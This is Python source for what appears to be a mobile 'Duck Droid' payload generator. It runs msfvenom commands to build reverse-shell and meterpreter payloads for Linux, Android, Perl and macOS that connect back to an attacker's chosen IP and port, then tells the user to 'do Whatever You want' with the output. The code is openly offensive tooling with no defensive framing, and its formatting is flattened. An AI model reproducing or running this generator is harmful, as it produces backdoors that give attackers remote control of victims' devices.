def Linux (): back.banner () linux_pld = int (input ("""\033[1;36mSelect type of Linux Payload.\n \033[1;36m[\033[1;34m1\033[1;36m]\033[1;34m--->> \033[1;36m linux/x86/shell/reverse_tcp \033[1;36m[\033[1;34m2\033[1;36m]\033[1;34m--->> \033[1;36m linux/x86/shell/reverse_http \033[1;36m[\033[1;34m3\033[1;36m]\033[1;34m--->> \033[1;36m linux/x86/shell/reverse_https \033[1;36m[\033[1;34m4\033[1;36m]\033[1;34m--->> \033[1;36m Exit \033[1;34mĐûčk \033[1;30m~~\033[1;35m|\033[1;34m••\033[1;35m|\033[1;30m~~ \033[1;34mĐrôid\033[1;31m/~ \033[1;36m""")) if linux_pld < 4: payloads = "linux/x86/shell/"+type[linux_pld-1] lhost = (input ("\n\033[1;34mENTER Local IP :---->>> \033[1;36m ")).replace (" ","") lport = (input ("\033[1;34mENTER Port No. :---->>> \033[1;36m ")).replace (" ","") output = (input ("\033[1;34mEnter your payload name:--> \033[1;36m")+".elf").replace (" ","") pld = "msfvenom -p "+payloads+" LHOST="+lhost+" LPORT="+lport+" -f elf -o /sdcard/Duck_Droid/"+output print (cyan+"Creating Payload...\n") os.system (pld) output_pld (output) if linux_pld == 4: back.exite () if linux_pld > 4: try: raise ValueError except ValueError: print ("\033[1;34mĐûčk \033[1;30m~~\033[1;35m|\033[1;34m••\033[1;35m|\033[1;30m~~ \033[1;34mĐrôid\033[1;31m/~"+cyan+" Plz Retry Enter number from given options."+norml) time.sleep(3) Linux ()
def Android (): back.banner () android_pld = int (input ("""\033[1;34mSelect type of Android Payload.\n \033[1;36m[\033[1;34m1\033[1;36m]\033[1;34m--->> \033[1;36m android/meterpreter/reverse_tcp \033[1;36m[\033[1;34m2\033[1;36m]\033[1;34m--->> \033[1;36m android/meterpreter/reverse_http \033[1;36m[\033[1;34m3\033[1;36m]\033[1;34m--->> \033[1;36m android/meterpreter/reverse_https \033[1;36m[\033[1;34m4\033[1;36m]\033[1;34m--->> \033[1;36m Exit \033[1;34mĐûčk \033[1;30m~~\033[1;35m|\033[1;34m••\033[1;35m|\033[1;30m~~ \033[1;34mĐrôid\033[1;31m/~ \033[1;36m""")) if android_pld < 4: payloads = "android/meterpreter/"+type[android_pld-1] lhost = (input ("\n\033[1;34mENTER Local IP :---->>> \033[1;36m ")).replace (" ","") lport = (input ("\033[1;34mENTER Port No. :---->>> \033[1;36m ")).replace (" ","") output = (input ("\033[1;34mEnter your payload name:--> \033[1;36m")+".apk").replace (" ","") pld = "msfvenom -p "+payloads+" LHOST="+lhost+" LPORT="+lport+" -f raw -o /sdcard/Duck_Droid/"+output print (cyan+"Creating Payload...\n") os.system (pld) output_pld (output) if android_pld == 4: back.exite () if android_pld > 4: try: raise ValueError except ValueError: print ("\033[1;34mĐûčk \033[1;30m~~\033[1;35m|\033[1;34m••\033[1;35m|\033[1;30m~~ \033[1;34mĐrôid\033[1;31m/~"+cyan+" Plz Retry and Enter number from given options."+norml) Android ()
def Perl (): back.banner () lhost = (input ("\n\033[1;34mENTER Local IP :---->>> \033[1;36m ")).replace (" ","") lport = (input ("\033[1;34mENTER Port No. :---->>> \033[1;36m ")).replace (" ","") output = (input ("\033[1;34mEnter your payload name:--> \033[1;36m")+".pl").replace (" ","") payloads = "cmd/windows/bind_perl" pld = "msfvenom -p "+payloads+" LHOST="+lhost+" LPORT="+lport+" -f raw -o /sdcard/Duck_Droid/"+output print (cyan+"Creating Payload...\n") os.system (pld) output_pld (output)
def Mac (): back.banner () lhost = (input ("\n\033[1;34mENTER Local IP :---->>> \033[1;36m ")).replace (" ","") lport = (input ("\033[1;34mENTER Port No. :---->>> \033[1;36m ")).replace (" ","") output = (input ("\033[1;34mEnter your payload name:--> \033[1;36m")+".macho").replace (" ","") payloads ="osx/x86/shell_reverse_tcp" pld = "msfvenom -p "+payloads+" LHOST="+lhost+" LPORT="+lport+" -f macho -o /sdcard/Duck_Droid/"+output print (cyan+"Creating Payload...\n") os.system (pld) output_pld (output)
def output_pld (output): if os.path.exists ("/sdcard/Duck_Droid/"+output) == True: back.finaly () print (cyan+"\n\nYour Payload Has generated successfull.\nIt has saved in Your \033[1;31m Internal Storage\n\033[1;36min \033[1;31m Duck_Droid "+cyan+" Folder"+cyan+" with the name \n\033[1;31m"+output) print (cyan+"\nGo there And do Whatever You want To\ndo With it\n\n") print ("\n\n \033[1;36m[\033[1;34m1\033[1;36m] \033[1;36m Back") print (" \033[1;36m[\033[1;34m2\033[1;36m] \033[1;36m Exit") back_opt = int (input ("\n\n\033[1;34mĐûčk \033[1;30m~~\033[1;35m|\033[1;34m••\033[1;35m|\033[1;30m~~ \033[1;34mĐrôid\033[1;31m/~ \033[1;36m")) if back_opt == 2: back.exite () else: back.main () else: print ("Your Payload has not Generated Successfully. Please Try again.")